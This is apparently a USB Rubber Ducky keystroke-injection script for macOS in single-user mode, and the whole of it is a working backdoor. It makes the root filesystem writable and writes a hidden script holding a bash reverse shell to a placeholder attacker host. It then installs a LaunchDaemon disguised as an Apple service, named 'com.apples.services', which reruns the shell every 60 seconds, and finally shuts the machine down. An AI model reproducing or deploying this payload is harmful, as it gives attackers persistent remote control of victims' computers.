STRING mount -uw /
ENTER
DELAY 3000
STRING mkdir /Library/.hidden
ENTER
DELAY 400
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/attackerip/attackerport 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 800
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 400
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 400
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 800
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 400
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 2000
STRING shutdown -h now
ENTER
